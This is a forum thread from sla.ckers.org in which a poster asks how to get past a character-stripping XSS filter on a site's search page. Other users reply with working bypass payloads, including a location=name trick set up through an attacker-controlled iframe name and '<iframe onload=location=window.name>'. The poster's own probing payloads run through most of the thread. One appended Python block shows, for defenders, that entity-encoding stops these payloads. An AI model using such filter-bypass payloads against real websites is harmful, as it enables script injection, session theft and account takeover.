Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Bypassing a restrictive XSS filter
Posted by: asrail
Date: February 27, 2012 10:30AM

I am having trouble getting around a restrictive XSS filter (also being limited to exactly 70 characters).

The filter removes any of these characters: / " ' ( ) !

What goes through is < > = : and normal alphanumeric characters and numbers.

Anyone got an idea what I could do? Not having brackets/slashes is probably the biggest issue here.

Re: Bypassing a restrictive XSS filter
Posted by: Anonymous User
Date: February 27, 2012 11:56AM

What are you injecting into?

If you're injecting into an attribute that needs a delimiter to close it, you may be out of luck. But if you can use > to close the current tag, or you are not inside a tag, you could use whatever you want, really.

Can you give an example of your input and output?

Re: Bypassing a restrictive XSS filter
Posted by: asrail
Date: February 27, 2012 12:11PM

The input from a GET parameter is being reflected in the HTML code. I am in the middle of HTML tags.

I can inject basic HTML tags and attributes (without any type of quote), but I cannot inject any slashes.

<script>alert('1:=!')</script>

becomes

<script>alert1:=<script>

I am losing all brackets, double-quotes, single quotes, exclamation marks, etc.

Re: Bypassing a restrictive XSS filter
Posted by: asrail
Date: February 27, 2012 12:19PM

I forgot to mention, I also don't have the brackets [].
It's as if they read
http://sla.ckers.org/forum/read.php?24,32930

Re: Bypassing a restrictive XSS filter
Posted by: Gareth Heyes
Date: February 27, 2012 12:37PM

location=name

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Bypassing a restrictive XSS filter
Posted by: asrail
Date: February 27, 2012 12:41PM

Sorry, I manage to do the basic XSS stuff, but I never got that location/window.name stuff. Maybe you have a link where it's explained a little further?

How would I avoid the script error because of the missing ability to close an opening <script> block?

<script>location=name</script>

becomes

<script>location=name<script>

I also cannot use HTML comments or JavaScript comments to ignore the HTML stuff that follows.

Re: Bypassing a restrictive XSS filter
Posted by: asrail
Date: February 27, 2012 12:56PM

<h1 id="xy">
foo bar XXXXXXXXXXXXXXXX&ldquo;
</h1>

I can inject at XXXXXXXXXXX.

Whitelist:
a-Z 0-9
- < > . : =

Updated: forgot the "=" char is allowed, too.


Re: Bypassing a restrictive XSS filter
Posted by: barbarianbob
Date: February 27, 2012 02:22PM

<iframe src="//victim/vuln.php?injection=%3Cscript%3Elocation%3Dname%3B%3C%2Fscript%3E" name="javascript:alert(1)"></iframe>

Re: Bypassing a restrictive XSS filter
Posted by: Gareth Heyes
Date: February 27, 2012 03:20PM

Whitespace?


Re: Bypassing a restrictive XSS filter
Posted by: asrail
Date: February 28, 2012 01:50PM

Thanks, understood the location=name now - very nice.
Whitespace is going through and commas too.

The main issue left is how to prevent the script error in this:

<script>location=name&ldquo;
</h1>

Maybe it's possible to use the "&" and the ";" somehow, but I have no idea so far.

WHITELIST updated:

a-Z 0-9
- < > . : = , @ (blank spaces)

This thing is really weird, because I need to trigger a search result, and some queries do not return a search result, so they don't get reflected (the reflection only happens on the search result page).
--------------
xxx?search=%3Cscript%3Elocation=name,1=1-;

this echoes

<script>location=name,1=1-;&ldquo;
</h1>

but "Uncaught SyntaxError: Unexpected token ;"...

--------------

xxx?search=<script>location=name,1=5;

becomes

<script>location=name,1=5;&ldquo;

--------------

xxx?search=<style>@\import "data:,*{x:expression(write(1))}";

becomes
<style>@import data:,{x:expressionwrite1};&ldquo;
</h1>


Re: Bypassing a restrictive XSS filter
Posted by: asrail
Date: February 28, 2012 01:56PM

As you can see, in some cases the brackets {} do work and aren't filtered. It's like there is some sort of randomizer.

I managed to insert a link like this:
xxx?search=<a href='feed:data:x,123456'>Click</a>

yields

<a href=feed:data:x,123456>click<a>&ldquo;
<h1>

But can't link to anything outside, because no "/"...

I started some random testing with strings, and some go through for whatever reason, like this one:

search=<script>var%20reload_product_tiles={_vBox:{left:0,width:9999},_url:"",_init:function%28%29{

becomes

<script>var reload_product_tiles={_vbox:{left:0,width:9999},_url:,_...&ldquo;

@Gareth, I could provide you with the URL to test if this possibly sparked your interest :-)


Re: Bypassing a restrictive XSS filter
Posted by: Gareth Heyes
Date: February 29, 2012 03:51AM

So if whitespace is allowed, then iframe allows you to execute JS.

<iframe onload=location=window.name>


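Why the site's filter fails and what fixes it, as an added defender-side example that is not code from this thread or the site under discussion: the character whitelist is reconstructed from asrail's posts, and the `<h1>` reflection context from his example; the template string, function names and the `starts_tag` check are assumptions. Stripping characters leaves `<iframe onload=location=window.name>` untouched, while entity-encoding the reflected search term for an HTML text context neutralises every payload in the thread without needing a list of bad characters.

```python
import html
import re

# Constructed from asrail's whitelist in this thread: everything outside
# a-z A-Z 0-9 - < > . : = , @ and whitespace is deleted by the site's filter.
NOT_ALLOWED = re.compile(r"[^A-Za-z0-9\-<>.:=,@\s]")

# Assumed page template: the reflected search term lands inside an <h1>,
# as in asrail's "foo bar XXXX&ldquo;" example.
TEMPLATE = '<h1 id="xy">\nfoo bar {search}&ldquo;\n</h1>'


def strip_filter(value: str) -> str:
    """The site's approach: delete blacklisted characters, keep the rest."""
    return NOT_ALLOWED.sub("", value)


def encode_filter(value: str) -> str:
    """The fix: entity-encode for an HTML text context, keeping every character."""
    return html.escape(value, quote=True)


def reflect(value: str, sanitizer) -> str:
    """Render the search page with the given sanitizer applied to the input."""
    return TEMPLATE.format(search=sanitizer(value))


def starts_tag(output: str, tag: str) -> bool:
    """True if the rendered page still contains an unencoded opening tag."""
    return re.search(rf"<{tag}\b", output, re.IGNORECASE) is not None


if __name__ == "__main__":
    # Both inputs are the ones posted in the thread.
    payloads = [
        "<script>alert('1:=!')</script>",
        "<iframe onload=location=window.name>",
    ]
    for payload in payloads:
        for name, fn in (("strip", strip_filter), ("encode", encode_filter)):
            out = reflect(payload, fn)
            alive = starts_tag(out, "script") or starts_tag(out, "iframe")
            print(f"{name:6} {payload!r:40} tag survives: {alive}")
```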
Re: Bypassing a restrictive XSS filter
Posted by: asrail
Date: March 01, 2012 12:05PM

Thank you Gareth, that was awesome. I didn't think of an iframe that loads nothing and instantly triggers the onload... had to add that to my repertoire :-)

Will hopefully acquire a new customer this way. You earned yourself a beer!
